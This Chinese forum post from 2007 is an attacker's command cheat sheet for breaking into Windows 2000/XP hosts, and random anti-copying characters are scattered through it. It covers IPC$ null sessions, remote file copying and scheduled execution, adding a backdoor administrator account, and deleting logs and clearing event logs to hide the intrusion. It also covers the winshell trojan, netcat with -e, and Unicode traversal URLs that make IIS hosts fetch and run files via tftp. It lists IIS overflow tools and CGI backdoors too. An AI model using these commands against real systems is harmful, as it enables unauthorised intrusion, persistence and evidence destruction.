找回密码
 入住遨海湾
搜索
网站解决方案专享优惠-3折上云
查看: 724|回复: 0

网管和黑客都必须知道的命令

[复制链接]
发表于 2007-12-22 22:40:00 | 显示全部楼层 |阅读模式

登录后查才能浏览下载更多咨询,有问题联系QQ:3283999

您需要 登录 才可以下载或查看,没有账号?入住遨海湾

×
  与远程主机建立空管连接 net use \IP地址ipc$ "" /use:"" # S. M3 @3 n2 b4 R  以管理员身份登录远程主机 net use \IP地址ipc$ "密码" /use:"Administrator" $ K" T3 a5 c1 v& i7 J   传送文件到远程主机WINNT目录下copy 本机目录路径程序 \IP地址admin$ , d$ V7 {* q$ T! m, k$ V   查看远程主机时间 net time \IP地址 5 d K& Y1 P4 L" c/ E  定时启动某个程序 at \IP地址 02:18 readme.exe B$ O& J* t+ r# A7 ~  查看共享 net view \IP地址 7 F& K$ n e& v/ v  查看netbios工作组列表 nBTstat -A IP地址 - D& |9 N/ {5 ~2 n$ R; k( k   将远程主机C盘映射为自己的F盘 net use f: \IP地址c$ ""/user:"Administrator" 6 @9 |. X, `+ @   这两条把自己增加到管理员组: net user 用户名 密码 /add & q. D! s) p+ o: u, q5 f% E( g  net locaLGroup Administrators 用户名 /add 7 D' |+ e. d& m7 N; n* u4 R K   断开连接 net use \IP地址ipc$ /delete " S D* f7 R6 G- S$ ` ; M+ f' c \: x% j! p+ K5 [  扫尾: ' |1 J; [7 _% ~2 [5 @# P  del C:winntsystem32logfiles*.* & I( b0 B& R7 f  del C:winntssytem32config*.evt 8 J) Q/ F% {/ L6 W' x* s2 a   del C:winntsystem32dTCLog*.* . R' d6 _7 }8 U; i, Y1 ]  del C:winntsystem32*.log & f4 V+ d9 Z0 _/ X6 w- D# }   del C:winntsystem32*.txt 1 F3 o# Q7 h, N y) ]9 Q   del C:winnt*.txt ) J7 J9 ~3 O! W8 s$ E. L" T   del C:winnt*.log 9 F4 r7 o/ i+ g+ l0 m8 ]" v& u1 M" ^1 N- {( ^% U 一、netsvc.exe 2 e9 v1 v; A$ t" k5 S3 z/ ]2 {; c5 p   下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: / O0 t' o) x1 H7 P, h6 D* ^' n   netsvc /list \IP地址 + a, d5 Y2 }# _4 F' i   netsvc schedule \IP地址 /query & g& \* ^- M( P! |+ @; \' X  netsvc \IP地址 schedule /start * i# [% Y' q K2 u & ^4 Z7 g( k' B0 P( v5 d9 b) H二、OpenTelnet.exe % F# c- h8 J2 f; h; ?% Z4 `% T' h' M  远程启动主机的Telnet服务,并绑定端口到7878,例如: ! C* Y; o$ j/ k2 x7 v  OpenTelnet \IP地址 用户名 密码 1 7878 $ Y/ K, x( t' d6 P. L, F  然后就可以telnet到主机的7878端口,进入DOS方式下: 8 W- Z' Z, G* S) M4 A% }6 Y   telnet IP地址 7878 . ]2 ?! F8 U3 a0 E& b6 G, X7 R6 K8 n6 c$ ?: t: f4 {: p 三、winshell.exe , ?# p$ o( G0 z% I1 x" R" m! n   一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: 7 [4 V/ X" k9 U( R' C$ I5 u   p Path (查看winshell主程序的路径信息) 5 g; p% h) @+ \3 ~ d% L3 a! {9 _   b reBoot (重新启动机器) + |. l6 n2 A' K% R   d shutDown (关闭机器) 7 W- R, \4 }1 p  s Shell (执行后你就会看到可爱的“C:>”) & r% I7 b h6 s$ C2 e5 p: {! y   x eXit (退出本次登录会话,此命令并不终止winshell的运行) 3 T# m! o8 d2 D! g+ `$ F  CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) + C) p; L5 \+ X" t% R' Z! q% o8 S9 T" `9 ~ l 四、3389登陆器,GUI方式登录远程主机的 6 W7 Z* E) v, ]( D2 M5 c$ B 3 ], Q# \* J' K 五、elsave.exe 6 o, A8 |( X* z/ _   事件日志清除工具 * d# u0 k) Z3 G/ w   elsave -s \IP地址 -l "application" -C s$ m% g0 \4 {: e% ]8 B' p, s  elsave -s \IP地址 -l "system" -C ; g/ V/ t. ?9 o; e) ~$ `& d/ N: o. w w   elsave -s \IP地址 -l "security" -C ( z0 j8 P' f4 H0 d) l5 b   执行后成功清除应用程序日志,系统日志,安全日志 . f! V3 k, W& R6 d- q6 W 六、hbulot.exe - Y. t& F' v3 I& H2 z6 y   开启win2kserver和winxp的3389服务 ' D( z# d8 e0 i; _7 T  hbulot (/r) 6 N L% r5 ?3 G% K, [ 5 _. C% i+ X$ K% A6 j* x' c' O七、nc.exe(netcat.exe) {0 `) m2 n* J9 i/ U! |   一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 ( V1 f: [: \7 q+ Y9 V! F# |  想要连接到某处: nc (-options) hostname port(s)(ports) ... 7 h; z9 B. _1 v, M; B' n4 X1 R& e   绑定端口等待连接: nc -l -p port (-options) (hostname) (port) * a8 Z9 {' f! y! F: ` ! H' g1 V& d0 L/ M+ q 参数: 6 [5 W6 Q1 M: a0 Y4 l) m   -e prog 程序重定向,一旦连接,就执行 (危险!) 1 S0 O: D+ u& P- c4 y  -g gateway source-routing hop point(s), up to 8 # |3 M4 e8 ?6 m; I. n$ g  -G num source-routing pointer: 4, 8, 12, ...& w' s! E/ g1 t0 H+ l   -h 帮助信息 2 w, k2 x0 L' X8 D! X   -i secs 延时的间隔 5 u) {6 L( C* ^6 |. c7 l6 j   -l 监听模式,用于入站连接 8 q. `* o- L7 `7 i   -n 指定数字的IP地址,不能用hostname 5 S; W& ~. l. l* W1 V# ~4 t   -o file 记录16进制的传输 8 n1 k. K; W! d% b' D; X   -p port 本地端口号 , f9 a; `1 o. O' _$ d  -r 任意指定本地及远程端口 1 e; a. o3 e' d  -s addr 本地源地址 , T5 t; h: x2 Q1 X   -u UDP模式 ( R( u! L* l9 o' X   -v 详细输出——用两个-v可得到更详细的内容 + y2 W& j# d9 @ c/ R, r  -w secs timeout的时间 9 k! o9 l3 k& D   -z 将输入输出关掉——用于扫描时 0 t4 P0 k. k; r9 J' e' H& F* Q- n 八、TFTPD32.EXE 7 I# `' F) d( z, ^, h   把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: + }6 K; A0 H$ j4 o   http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:winntsystem32文件名 ; k8 n$ a. y! ]  然后可以直接令文件运行: + f3 c8 u0 E& S; n5 ?9 h/ r* |/ g  http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 C5 r" ^3 D% a 1 Y' J- X! ]4 E) r% M九、prihack.exe是IIS的printer远程缓冲区溢出工具" q3 ~% P2 P) |0 e% E' A   idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 0 S' I& v1 p6 Z) u# t2 f' T) p7 H# g5 s X1 n 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接.
遨海湾-心灵的港湾 www.aosea.com
您需要登录后才可以回帖 登录 | 入住遨海湾

本版积分规则

网站解决方案专享优惠-3折上云

QQ|手机版|小黑屋|遨海湾超级社区

GMT+8, 2025-4-25 02:11

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表